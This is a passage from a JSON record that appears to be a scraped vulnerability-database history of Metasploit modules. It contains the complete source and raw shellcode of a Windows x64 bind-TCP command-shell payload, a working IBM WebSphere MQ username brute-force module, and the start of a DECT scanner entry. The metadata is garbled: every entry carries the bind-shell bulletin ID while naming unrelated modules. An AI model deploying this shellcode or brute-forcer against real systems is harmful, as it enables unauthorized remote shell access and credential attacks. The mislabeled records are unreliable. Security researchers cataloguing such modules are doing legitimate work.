\"\\x52\\x41\\x51\\x48\\x8B\\x52\\x20\\x8B\\x42\\x3C\\x48\\x01\\xD0\\x8B\\x80\\x88\" +\n \"\\x00\\x00\\x00\\x48\\x85\\xC0\\x74\\x67\\x48\\x01\\xD0\\x50\\x8B\\x48\\x18\\x44\" +\n \"\\x8B\\x40\\x20\\x49\\x01\\xD0\\xE3\\x56\\x48\\xFF\\xC9\\x41\\x8B\\x34\\x88\\x48\" +\n \"\\x01\\xD6\\x4D\\x31\\xC9\\x48\\x31\\xC0\\xAC\\x41\\xC1\\xC9\\x0D\\x41\\x01\\xC1\" +\n \"\\x38\\xE0\\x75\\xF1\\x4C\\x03\\x4C\\x24\\x08\\x45\\x39\\xD1\\x75\\xD8\\x58\\x44\" +\n \"\\x8B\\x40\\x24\\x49\\x01\\xD0\\x66\\x41\\x8B\\x0C\\x48\\x44\\x8B\\x40\\x1C\\x49\" +\n \"\\x01\\xD0\\x41\\x8B\\x04\\x88\\x48\\x01\\xD0\\x41\\x58\\x41\\x58\\x5E\\x59\\x5A\" +\n \"\\x41\\x58\\x41\\x59\\x41\\x5A\\x48\\x83\\xEC\\x20\\x41\\x52\\xFF\\xE0\\x58\\x41\" +\n \"\\x59\\x5A\\x48\\x8B\\x12\\xE9\\x57\\xFF\\xFF\\xFF\\x5D\\x49\\xBE\\x77\\x73\\x32\" +\n \"\\x5F\\x33\\x32\\x00\\x00\\x41\\x56\\x49\\x89\\xE6\\x48\\x81\\xEC\\xA0\\x01\\x00\" +\n \"\\x00\\x49\\x89\\xE5\\x49\\xBC\\x02\\x00\\x11\\x5C\\x00\\x00\\x00\\x00\\x41\\x54\" +\n \"\\x49\\x89\\xE4\\x4C\\x89\\xF1\\x41\\xBA\\x4C\\x77\\x26\\x07\\xFF\\xD5\\x4C\\x89\" +\n \"\\xEA\\x68\\x01\\x01\\x00\\x00\\x59\\x41\\xBA\\x29\\x80\\x6B\\x00\\xFF\\xD5\\x50\" +\n \"\\x50\\x4D\\x31\\xC9\\x4D\\x31\\xC0\\x48\\xFF\\xC0\\x48\\x89\\xC2\\x48\\xFF\\xC0\" +\n \"\\x48\\x89\\xC1\\x41\\xBA\\xEA\\x0F\\xDF\\xE0\\xFF\\xD5\\x48\\x89\\xC7\\x6A\\x10\" +\n \"\\x41\\x58\\x4C\\x89\\xE2\\x48\\x89\\xF9\\x41\\xBA\\xC2\\xDB\\x37\\x67\\xFF\\xD5\" +\n \"\\x48\\x31\\xD2\\x48\\x89\\xF9\\x41\\xBA\\xB7\\xE9\\x38\\xFF\\xFF\\xD5\\x4D\\x31\" +\n \"\\xC0\\x48\\x31\\xD2\\x48\\x89\\xF9\\x41\\xBA\\x74\\xEC\\x3B\\xE1\\xFF\\xD5\\x48\" +\n \"\\x89\\xF9\\x48\\x89\\xC7\\x41\\xBA\\x75\\x6E\\x4D\\x61\\xFF\\xD5\\x48\\x81\\xC4\" +\n \"\\xA0\\x02\\x00\\x00\\x49\\xB8\\x63\\x6D\\x64\\x00\\x00\\x00\\x00\\x00\\x41\\x50\" +\n \"\\x41\\x50\\x48\\x89\\xE2\\x57\\x57\\x57\\x4D\\x31\\xC0\\x6A\\x0D\\x59\\x41\\x50\" +\n \"\\xE2\\xFC\\x66\\xC7\\x44\\x24\\x54\\x01\\x01\\x48\\x8D\\x44\\x24\\x18\\xC6\\x00\" +\n \"\\x68\\x48\\x89\\xE6\\x56\\x50\\x41\\x50\\x41\\x50\\x41\\x50\\x49\\xFF\\xC0\\x41\" +\n \"\\x50\\x49\\xFF\\xC8\\x4D\\x89\\xC1\\x4C\\x89\\xC1\\x41\\xBA\\x79\\xCC\\x3F\\x86\" +\n \"\\xFF\\xD5\\x48\\x31\\xD2\\x48\\xFF\\xCA\\x8B\\x0E\\x41\\xBA\\x08\\x87\\x1D\\x60\" +\n \"\\xFF\\xD5\\xBB\\xE0\\x1D\\x2A\\x0A\\x41\\xBA\\xA6\\x95\\xBD\\x9D\\xFF\\xD5\\x48\" +\n \"\\x83\\xC4\\x28\\x3C\\x06\\x7C\\x0A\\x80\\xFB\\xE0\\x75\\x05\\xBB\\x47\\x13\\x72\" +\n \"\\x6F\\x6A\\x00\\x59\\x41\\x89\\xDA\\xFF\\xD5\"\n }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-16T19:32:29", "differentElements": ["description", "modified", "published", "sourceData", "sourceHref", "title"], "edition": 11}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/X64/SHELL_BIND_TCP", "hash": "3c1eb5ffdb0b9a9fd485c85464b0dc6e", "type": "metasploit", "bulletinFamily": "exploit", "title": "IBM WebSphere MQ Login Check", "description": "This module can be used to bruteforce usernames that can be used to connect to a queue manager. The name of a valid server-connection channel without SSL configured is required, as well as a list of usernames to try.\n", "published": "2018-10-28T19:29:45", "modified": "2018-11-29T23:29:05", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-07-21T18:59:11", "history": [], "viewCount": 19, "enchantments": {"score": {"value": 1.6, "vector": "NONE", "modified": "2019-07-21T18:59:11"}, "dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:6387497839583318095", "KITPLOIT:5710325928566647624"]}, {"type": "cve", "idList": ["CVE-2019-11989", "CVE-2019-11990", "CVE-2019-7590", "CVE-2019-1167", "CVE-2019-13637"]}, {"type": "threatpost", "idList": ["THREATPOST:225698ED1A5A2058881086D75E7ADE70", "THREATPOST:92607F395C2C7C7A05BCCE4A5547160A", "THREATPOST:54B8C2E27967886BC5CF55CA1E891C6C"]}, {"type": "talosblog", "idList": ["TALOSBLOG:BDEC9F3166490EE6F1F4DFE075BDD2D9", "TALOSBLOG:AA5D0E93E7EEBBBB419E1CCF1191A04E"]}, {"type": "thn", "idList": ["THN:9C451869D6D82B209A22C2E5F247FEE0"]}, {"type": "exploitdb", "idList": ["EDB-ID:47137", "EDB-ID:47135"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:153698", "PACKETSTORM:153697"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:0FEB0AF7A8D15834DA7D1882395A9D7C"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310142623", "OPENVAS:1361412562310113444"]}], "modified": "2019-07-21T18:59:11"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/misc/ibm_mq_login.rb", "sourceData": "##\n# This module requires Metasploit: http://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'IBM WebSphere MQ Login Check',\n 'Description' => 'This module can be used to bruteforce usernames that can be used to connect to a queue manager. The name of a valid server-connection channel without SSL configured is required, as well as a list of usernames to try.',\n 'Author' => 'Petros Koutroumpis',\n 'License' => MSF_LICENSE\n )\n register_options([\n Opt::RPORT(1414),\n OptInt.new('TIMEOUT', [true, \"The socket connect timeout in seconds\", 5]),\n OptInt.new('CONCURRENCY', [true, \"The number of usernames to check concurrently\", 10]),\n OptString.new('QUEUE_MANAGER', [true, \"Queue Manager name to use\" ,\"\"]),\n OptString.new('CHANNEL', [true, \"Channel to use\" ,\"SYSTEM.ADMIN.SVRCONN\"]),\n OptString.new('PASSWORD', [false, \"Optional password to attempt with login\"]),\n OptPath.new('USERNAMES_FILE',\n [ true, \"The file that contains a list of usernames. UserIDs are case insensitive!\"]\n )])\n #deregister_options('THREADS')\n end\n\n def run_host(ip)\n @usernames = []\n if datastore['CHANNEL'].length.to_i > 20\n print_error(\"Channel name cannot be more that 20 characters.\")\n exit\n end\n if datastore['QUEUE_MANAGER'].length.to_i > 48\n print_error(\"Queue Manager name cannot be more that 48 characters.\")\n exit\n end\n begin\n username_list\n rescue ::Rex::ConnectionError\n rescue ::Exception => e\n print_error(\"#{e} #{e.backtrace}\")\n end\n print_line\n if(@usernames.empty?)\n print_status(\"#{ip}:#{rport} No valid users found.\")\n else\n print_good(\"#{ip}:#{rport} Valid usernames found: #{@usernames}\")\n report_note(\n :host => rhost,\n :port => rport,\n :type => 'mq.usernames'\n )\n print_line\n end\n end\n\n def first_packet(channel,qm_name)\n init1 = \"\\x54\\x53\\x48\\x20\" + \t# StructId\n \"\\x00\\x00\\x01\\x0c\" + \t\t# MQSegmLen\n \"\\x01\" + \t\t\t\t# ByteOrder\n \"\\x01\" + \t\t\t\t# SegmType\n \"\\x31\" + \t\t\t\t# CtlFlag1\n \"\\x00\" + \t\t\t\t# CtlFlag2\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" +# LUW Ident\n \"\\x00\\x00\\x01\\x11\" + \t\t# Encoding\n \"\\x04\\xb8\" + \t\t\t# CCSID\n \"\\x00\\x00\" + \t\t\t# Reserved\n \"\\x49\\x44\\x20\\x20\" + \t\t# StructId\n \"\\x0d\" + \t\t\t\t# FAPLevel\n \"\\x26\" + \t\t\t\t# CapFlag1\n \"\\x00\" + \t\t\t\t# ECapFlag1\n \"\\x00\" + \t\t\t\t# InierrFlg1\n \"\\x00\\x00\" + \t\t\t# ReserveD\n \"\\x00\\x00\" + \t\t\t# MaxMsgBtch\n \"\\x00\\x00\\x7f\\xec\" + \t\t# MaxTrSize\n \"\\x06\\x40\\x00\\x00\" + \t\t# MaxMsgSize\n \"\\x00\\x00\\x00\\x00\" + \t\t# SeqWrapVal\n channel + \t\t\t\t# Channel Name\n \"\\x51\" + \t\t\t\t# CapFlag2\n \"\\x00\" + \t\t\t\t# ECapFlag2\n \"\\x04\\xb8\" + \t\t\t# ccsid\n qm_name + \t\t\t\t# Queue Manager Name\n \"\\x00\\x00\\x00\\x01\" + \t\t# HBInterval\n \"\\x00\\x8a\" + \t\t\t# EFLLength\n \"\\x00\" +\t\t\t\t# IniErrFlg2\n \"\\x00\" + \t\t\t\t# Reserved1\n \"\\x00\\xff\" + \t\t\t# HdrCprsLst\n \"\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\" +# MsgCprsLst1\n \"\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\" +# MsgCprsLst2\n \"\\x00\\x00\" + \t\t\t# Reserved2\n \"\\x00\\x00\\x00\\x00\" + \t\t# SSLKeyRst\n \"\\x00\\x00\\x00\\x0a\" + \t\t# ConvBySkt\n \"\\x08\" + \t\t\t\t# CapFlag3\n \"\\x00\" + \t\t\t\t# ECapFlag3\n \"\\x00\\x00\" + \t\t\t# Reserved3\n \"\\x00\\x00\\x00\\x00\" + \t\t# ProcessId\n \"\\x00\\x00\\x00\\x00\" + \t\t# ThreadId\n \"\\x00\\x00\\x00\\x1b\" + \t\t# TraceId\n \"MQMM09000000\" + \t\t\t# ProdId\n \"MQMID\" + \"\\x20\"*43 + \t\t# MQM ID\n \"\\x00\\x01\\x00\\x00\\xff\\xff\\xff\\xff\" +# Unknown1\n \"\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\" +# Unknown2\n \"\\xff\\xff\\xff\\xff\\xf1\\x18\\xa6\\x93\" +# Unknown3\n \"\\x2b\\x8a\\x44\\x3c\\x67\\x53\\x73\\x08\"\t# Unknown4\n end\n\n def second_packet(channel,qm_name)\n init2 = \"\\x54\\x53\\x48\\x4d\" + \t# StructId\n \"\\x00\\x00\\x00\\xf4\" + \t\t# MQSegmLen\n \"\\x00\\x00\\x00\\x01\" + \t\t# Convers Id\n \"\\x00\\x00\\x00\\x00\" + \t\t# Request Id\n \"\\x02\" + \t\t\t\t# ByteOrder\n \"\\x01\" + \t\t\t\t# SegmType\n \"\\x31\" + \t\t\t\t# CtlFlag1\n \"\\x00\" + \t\t\t\t# CtlFlag2\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" +# LUW Ident\n \"\\x11\\x01\\x00\\x00\" + \t\t# Encoding\n \"\\xb5\\x01\" + \t\t\t# CCSID\n \"\\x00\\x00\" + \t\t\t# Reserved\n \"\\x49\\x44\\x20\\x20\" + \t\t# StructId\n \"\\x0c\" + \t\t\t\t# FAPLevel\n \"\\x26\" + \t\t\t\t# CapFlag1\n \"\\x00\" + \t\t\t\t# ECapFlag1\n \"\\x00\" + \t\t\t\t# IniErrFlg1\n \"\\x00\\x00\" + \t\t\t# Reserved\n \"\\x00\\x00\" + \t\t\t# MaxMsgBtch\n \"\\xec\\x7f\\x00\\x00\" + \t\t# MaxTrSize\n \"\\x00\\x00\\x40\\x00\" + \t\t# MaxMsgSize\n \"\\x00\\x00\\x00\\x00\" + \t\t# SeqWrapVal\n channel + \t\t\t\t# Channel Name\n \"\\x51\" + \t\t\t\t# CapFlag2\n \"\\x00\" + \t\t\t\t# ECapFlag2\n \"\\xb5\\x01\" + \t\t\t# ccsid\n qm_name + \t\t\t\t# Queue Manager Name\n \"\\x2c\\x01\\x00\\x00\" + \t\t# HBInterval\n \"\\x8a\\x00\" + \t\t\t# EFLLength\n \"\\x00\" + \t\t\t\t# IniErrFlg2\n \"\\x00\" + \t\t\t\t# Reserved1\n \"\\x00\\xff\" + \t\t\t# HdrCprsLst\n \"\\x00\\xff\\xff\\xff\\xff\\xff\\xff\" + \t# MsgCprsLst1\n \"\\xff\\xff\\xff\\xff\\xff\\xff\\xff\" + \t# MsgCprsLst2\n \"\\xff\\xff\" + \t\t\t# MsgCprsLst3\n \"\\x00\\x00\" + \t\t\t# Reserved2\n \"\\x00\\x00\\x00\\x00\" + \t\t# SSLKeyRst\n \"\\x0a\\x00\\x00\\x00\" + \t\t# ConvBySkt\n \"\\x00\" + \t\t\t\t# CapFlag3\n \"\\x00\" + \t\t\t\t# ECapFlag3\n \"\\x00\\x00\" + \t\t\t# Reserved3\n \"\\x00\\x00\\x00\\x00\" + \t\t# ProcessId\n \"\\x00\\x00\\x00\\x00\" + \t\t# ThreadId\n \"\\x1b\\x00\\x00\\x00\" + \t\t# TraceId\n \"MQMM09000000\" + \t\t\t# ProdId\n \"MQMID\" + \"\\x20\"*43 \t\t# MQM ID\n end\n\n def send_userid(userid,uname)\n\n if datastore['PASSWORD'].nil?\n password = \"\\x00\" * 12\n else\n password = datastore['PASSWORD']\n if (password.length > 12)\n print_warning(\"Passwords greater than 12 characters are unsupported. Truncating...\")\n password = password[0..12]\n end\n password = password + ( \"\\x00\" * (12-password.length) )\n end\n vprint_status(\"Using password: '#{password}' (Length: #{password.length})\")\n\n send_userid = \"\\x54\\x53\\x48\\x4d\" + \t# StructId\n \"\\x00\\x00\\x00\\xa8\" + \t\t# MQSegmLen\n \"\\x00\\x00\\x00\\x01\" + \t\t# Convers ID\n \"\\x00\\x00\\x00\\x00\" + \t\t# Request ID\n \"\\x02\" + \t\t\t\t# Byte Order\n \"\\x08\" + \t\t\t\t# SegmType\n \"\\x30\" + \t\t\t\t# CtlFlag1\n \"\\x00\" + \t\t\t\t# CtlFlag2\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" +# LUW Ident\n \"\\x11\\x01\\x00\\x00\" + \t\t# Encoding\n \"\\xb5\\x01\" + \t\t\t# CCSID\n \"\\x00\\x00\" + \t\t\t# Reserved\n \"\\x55\\x49\\x44\\x20\" + \t\t# StructId\n userid + \t\t\t\t# UserId - Doesnt affect anything\n password + # Password\n uname + \t\t\t\t# Long UID - This matters!\n \"\\x00\" + \t\t\t\t# SID Len\n \"\\x00\" * 39 \t\t\t# Unknown\n end\n\n def start_conn(qm_name)\n start_conn = \"\\x54\\x53\\x48\\x4d\" + \t# StructId\n \"\\x00\\x00\\x01\\x38\" + \t\t# MQSegmLen\n \"\\x00\\x00\\x00\\x01\" + \t\t# Convers ID\n \"\\x00\\x00\\x00\\x00\" + \t\t# Request ID\n \"\\x02\" + \t\t\t\t# Byte Order\n \"\\x81\" + \t\t\t\t# SegmType\n \"\\x30\" + \t\t\t\t# CtlFlag1\n \"\\x00\" + \t\t\t\t# CtlFlag2\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" +# LUW Ident\n \"\\x11\\x01\\x00\\x00\" + \t\t# Encoding\n \"\\xb5\\x01\" + \t\t\t# CCSID\n \"\\x00\\x00\" +\t\t\t# Reserved\n \"\\x00\\x00\\x01\\x38\" + \t\t# Reply Len\n \"\\x00\\x00\\x00\\x00\" + \t\t# Compl Code\n \"\\x00\\x00\\x00\\x00\" + \t\t# Reason Code\n \"\\x00\\x00\\x00\\x00\" + \t\t# Object Hdl\n qm_name + \t\t\t\t# Queue Manager Name\n \"\\x4d\\x51\\x20\\x45\\x78\\x70\\x6c\" + \t# Appl Name\n \"\\x6f\\x72\\x65\\x72\\x20\\x39\\x2e\" + \t# Appl Name\n \"\\x30\\x2e\\x30\\x20\\x20\\x20\\x20\" + \t# Appl Name\n \"\\x20\\x20\\x20\\x20\\x20\\x20\\x20\" + \t# Appl Name\n \"\\x1c\\x00\\x00\\x00\" + \t\t# ApplType\n \"\\x00\" * 32 + \t\t\t# AccntTok\n \"\\x03\\x00\\x00\\x00\" + \t\t# MQCONNX\n \"\\x00\\x00\\x00\\x00\" + \t\t# Options\n \"\\x46\\x43\\x4e\\x4f\" + \t\t# Struct ID\n \"\\x02\\x00\\x00\\x00\" + \t\t# Version\n \"\\x00\\x00\\x00\\x00\" + \t\t# Option\n \"\\x4d\\x51\\x4a\\x42\\x30\\x39\\x30\" + \t# msgid\n \"\\x30\\x30\\x30\\x30\\x34\" + \t\t# msgid\n \"MQM\" + \"\\x20\" * 45 + \t\t# MqmId\n \"\\x00\" * 68\t\t\t\t# Unknown\n end\n\n def username_list\n username_data = get_usernames\n while (username_data.length > 0)\n t = []\n r = []\n begin\n 1.upto(datastore['CONCURRENCY']) do\n this_username = username_data.shift\n if this_username.nil?\n next\n end\n t << framework.threads.spawn(\"Module(#{self.refname})-#{rhost}:#{rport}\", false, this_username) do |username|\n connect\n vprint_status \"#{rhost}:#{rport} - Sending request for #{username}...\"\n channel = datastore['CHANNEL']\n if channel.length > 20\n print_error(\"Channel name must be less than 20 characters.\")\n next\n end\n channel += \"\\x20\" * (20-channel.length.to_i) # max channel name length is 20\n qm_name = datastore['QUEUE_MANAGER']\n if qm_name.length > 48\n print_error(\"Queue Manager name must be less than 48 characters.\")\n next\n end\n qm_name += \"\\x20\" * (48-qm_name.length.to_i) # max queue manager name length is 48\n if username.length > 12\n print_error(\"Username must be less than 12 characters.\")\n next\n end\n uname = username + \"\\x20\" * (64-username.length.to_i)\n userid = username + \"\\x20\" * (12 - username.length.to_i) # this doesnt make a difference\n timeout = datastore['TIMEOUT'].to_i\n s = connect(false,\n {\n 'RPORT' => rport,\n 'RHOST' => rhost,\n }\n )\n s.put(first_packet(channel,qm_name))\n first_response = s.get_once(-1,timeout)\n if first_response[-4..-1] == \"\\x00\\x00\\x00\\x02\" # CHANNEL_WRONG_TYPE code\n print_error(\"Channel needs to be MQI type!\")\n next\n end\n s.put(second_packet(channel,qm_name))\n second_response = s.get_once(-1,timeout)\n s.put(send_userid(userid,uname))\n s.put(start_conn(qm_name))\n data = s.get_once(-1,timeout)\n if data[41..44] == \"\\x00\\x00\\x00\\x00\"\n print_status(\"Found username: #{username}\")\n @usernames << username\n end\n disconnect\n end\n end\n t.each {|x| x.join }\n end\n end\n end\n\n def get_usernames\n if(! @common)\n File.open(datastore['USERNAMES_FILE'], \"rb\") do |fd|\n data = fd.read(fd.stat.size)\n @common = data.split(/\\n/).compact.uniq\n end\n end\n @common\n end\n\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-21T18:59:11", "differentElements": ["description", "modified", "published", "sourceData", "sourceHref", "title"], "edition": 12}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/X64/SHELL_BIND_TCP", "hash": "d3aa2f8684d6dd258707ef5b8753c445", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows x64 Command Shell, Bind TCP Inline", "description": "Listen for a connection and spawn a command shell (Windows x64)\n", "published": "2009-08-27T19:29:54", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-07-21T21:15:22", "history": [], "viewCount": 19, "enchantments": {"score": {"value": 2.8, "vector": "NONE", "modified": "2019-07-21T21:15:22"}, "dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:6387497839583318095", "KITPLOIT:5710325928566647624"]}, {"type": "cve", "idList": ["CVE-2019-11989", "CVE-2019-11990", "CVE-2019-7590", "CVE-2019-1167", "CVE-2019-13637"]}, {"type": "threatpost", "idList": ["THREATPOST:225698ED1A5A2058881086D75E7ADE70", "THREATPOST:92607F395C2C7C7A05BCCE4A5547160A", "THREATPOST:54B8C2E27967886BC5CF55CA1E891C6C"]}, {"type": "talosblog", "idList": ["TALOSBLOG:BDEC9F3166490EE6F1F4DFE075BDD2D9", "TALOSBLOG:AA5D0E93E7EEBBBB419E1CCF1191A04E"]}, {"type": "thn", "idList": ["THN:9C451869D6D82B209A22C2E5F247FEE0"]}, {"type": "exploitdb", "idList": ["EDB-ID:47137", "EDB-ID:47135"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:153697", "PACKETSTORM:153698"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:0FEB0AF7A8D15834DA7D1882395A9D7C"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310142623", "OPENVAS:1361412562310113444"]}], "modified": "2019-07-21T21:15:22"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/windows/x64/shell_bind_tcp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/bind_tcp'\nrequire 'msf/base/sessions/command_shell'\nrequire 'msf/base/sessions/command_shell_options'\n\nmodule MetasploitModule\n\n CachedSize = 505\n\n include Msf::Payload::Windows\n include Msf::Payload::Single\n include Msf::Sessions::CommandShellOptions\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Windows x64 Command Shell, Bind TCP Inline',\n 'Description' => 'Listen for a connection and spawn a command shell (Windows x64)',\n 'Author' => [ 'sf' ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X64,\n 'Handler' => Msf::Handler::BindTcp,\n 'Session' => Msf::Sessions::CommandShell,\n 'Payload' =>\n {\n 'Offsets' =>\n {\n 'LPORT' => [ 232, 'n' ],\n 'EXITFUNC' => [ 467, 'V' ],\n },\n 'Payload' =>\n \"\\xFC\\x48\\x83\\xE4\\xF0\\xE8\\xC0\\x00\\x00\\x00\\x41\\x51\\x41\\x50\\x52\\x51\" +\n \"\\x56\\x48\\x31\\xD2\\x65\\x48\\x8B\\x52\\x60\\x48\\x8B\\x52\\x18\\x48\\x8B\\x52\" +\n \"\\x20\\x48\\x8B\\x72\\x50\\x48\\x0F\\xB7\\x4A\\x4A\\x4D\\x31\\xC9\\x48\\x31\\xC0\" +\n \"\\xAC\\x3C\\x61\\x7C\\x02\\x2C\\x20\\x41\\xC1\\xC9\\x0D\\x41\\x01\\xC1\\xE2\\xED\" +\n \"\\x52\\x41\\x51\\x48\\x8B\\x52\\x20\\x8B\\x42\\x3C\\x48\\x01\\xD0\\x8B\\x80\\x88\" +\n \"\\x00\\x00\\x00\\x48\\x85\\xC0\\x74\\x67\\x48\\x01\\xD0\\x50\\x8B\\x48\\x18\\x44\" +\n \"\\x8B\\x40\\x20\\x49\\x01\\xD0\\xE3\\x56\\x48\\xFF\\xC9\\x41\\x8B\\x34\\x88\\x48\" +\n \"\\x01\\xD6\\x4D\\x31\\xC9\\x48\\x31\\xC0\\xAC\\x41\\xC1\\xC9\\x0D\\x41\\x01\\xC1\" +\n \"\\x38\\xE0\\x75\\xF1\\x4C\\x03\\x4C\\x24\\x08\\x45\\x39\\xD1\\x75\\xD8\\x58\\x44\" +\n \"\\x8B\\x40\\x24\\x49\\x01\\xD0\\x66\\x41\\x8B\\x0C\\x48\\x44\\x8B\\x40\\x1C\\x49\" +\n \"\\x01\\xD0\\x41\\x8B\\x04\\x88\\x48\\x01\\xD0\\x41\\x58\\x41\\x58\\x5E\\x59\\x5A\" +\n \"\\x41\\x58\\x41\\x59\\x41\\x5A\\x48\\x83\\xEC\\x20\\x41\\x52\\xFF\\xE0\\x58\\x41\" +\n \"\\x59\\x5A\\x48\\x8B\\x12\\xE9\\x57\\xFF\\xFF\\xFF\\x5D\\x49\\xBE\\x77\\x73\\x32\" +\n \"\\x5F\\x33\\x32\\x00\\x00\\x41\\x56\\x49\\x89\\xE6\\x48\\x81\\xEC\\xA0\\x01\\x00\" +\n \"\\x00\\x49\\x89\\xE5\\x49\\xBC\\x02\\x00\\x11\\x5C\\x00\\x00\\x00\\x00\\x41\\x54\" +\n \"\\x49\\x89\\xE4\\x4C\\x89\\xF1\\x41\\xBA\\x4C\\x77\\x26\\x07\\xFF\\xD5\\x4C\\x89\" +\n \"\\xEA\\x68\\x01\\x01\\x00\\x00\\x59\\x41\\xBA\\x29\\x80\\x6B\\x00\\xFF\\xD5\\x50\" +\n \"\\x50\\x4D\\x31\\xC9\\x4D\\x31\\xC0\\x48\\xFF\\xC0\\x48\\x89\\xC2\\x48\\xFF\\xC0\" +\n \"\\x48\\x89\\xC1\\x41\\xBA\\xEA\\x0F\\xDF\\xE0\\xFF\\xD5\\x48\\x89\\xC7\\x6A\\x10\" +\n \"\\x41\\x58\\x4C\\x89\\xE2\\x48\\x89\\xF9\\x41\\xBA\\xC2\\xDB\\x37\\x67\\xFF\\xD5\" +\n \"\\x48\\x31\\xD2\\x48\\x89\\xF9\\x41\\xBA\\xB7\\xE9\\x38\\xFF\\xFF\\xD5\\x4D\\x31\" +\n \"\\xC0\\x48\\x31\\xD2\\x48\\x89\\xF9\\x41\\xBA\\x74\\xEC\\x3B\\xE1\\xFF\\xD5\\x48\" +\n \"\\x89\\xF9\\x48\\x89\\xC7\\x41\\xBA\\x75\\x6E\\x4D\\x61\\xFF\\xD5\\x48\\x81\\xC4\" +\n \"\\xA0\\x02\\x00\\x00\\x49\\xB8\\x63\\x6D\\x64\\x00\\x00\\x00\\x00\\x00\\x41\\x50\" +\n \"\\x41\\x50\\x48\\x89\\xE2\\x57\\x57\\x57\\x4D\\x31\\xC0\\x6A\\x0D\\x59\\x41\\x50\" +\n \"\\xE2\\xFC\\x66\\xC7\\x44\\x24\\x54\\x01\\x01\\x48\\x8D\\x44\\x24\\x18\\xC6\\x00\" +\n \"\\x68\\x48\\x89\\xE6\\x56\\x50\\x41\\x50\\x41\\x50\\x41\\x50\\x49\\xFF\\xC0\\x41\" +\n \"\\x50\\x49\\xFF\\xC8\\x4D\\x89\\xC1\\x4C\\x89\\xC1\\x41\\xBA\\x79\\xCC\\x3F\\x86\" +\n \"\\xFF\\xD5\\x48\\x31\\xD2\\x48\\xFF\\xCA\\x8B\\x0E\\x41\\xBA\\x08\\x87\\x1D\\x60\" +\n \"\\xFF\\xD5\\xBB\\xE0\\x1D\\x2A\\x0A\\x41\\xBA\\xA6\\x95\\xBD\\x9D\\xFF\\xD5\\x48\" +\n \"\\x83\\xC4\\x28\\x3C\\x06\\x7C\\x0A\\x80\\xFB\\xE0\\x75\\x05\\xBB\\x47\\x13\\x72\" +\n \"\\x6F\\x6A\\x00\\x59\\x41\\x89\\xDA\\xFF\\xD5\"\n }\n ))\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-07-21T21:15:22", "differentElements": ["description", "published", "sourceData", "sourceHref", "title"], "edition": 13}, {"bulletin": {"id": "MSF:PAYLOAD/WINDOWS/X64/SHELL_BIND_TCP", "hash": "a0a9591da3ee5bdbc8b6cd624dde9f91", "type": "metasploit", "bulletinFamily": "exploit", "title": "DECT Base Station Scanner", "description": "This module scans for DECT base stations\n", "published": "2009-09-12T15:40:33", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-07-25T07:13:24", "history": [], "viewCount": 19, "enchantments": {"score": {"value": 3.0, "vector": "NONE", "modified": "2019-07-25T07:13:24"}, "dependencies": {"references": [{"type": "pentestit", "idList": ["PENTESTIT:3699C81C5F2D75668446A68245CA8BA5"]}, {"type": "kitploit", "idList": ["KITPLOIT:1521717899068290187", "KITPLOIT:6666619513896093313", "KITPLOIT:6387497839583318095"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:89070BA9467D02F1834CE0214BB8B605"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:353CB4603C296A43DDDDDAE6CAC6BE25"]}, {"type": "exploitdb", "idList": ["EDB-ID:47152", "EDB-ID:47148"]}, {"type": "myhack58", "idList": ["MYHACK58:62201995204"]}, {"type": "cve", "idList": ["CVE-2019-2799", "CVE-2019-11694", "CVE-2019-9818", "CVE-2019-11700", "CVE-2019-11702", "CVE-2019-11989", "CVE-2019-11990"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:3A2630BDE36D76A2AD8878BA46386B1A", "CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "threatpost", "idList": ["THREATPOST:5049F818B995E5121EDA184A34A957E6"]}, {"type": "msrc", "idList": ["MSRC:906AC0755E9EC24CAF074F7E4CF693E7"]}], "modified": "2019-07-25T07:13:24"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/dect/station_scanner.rb", "sourceData": "##\n# This module requires Metasploit: 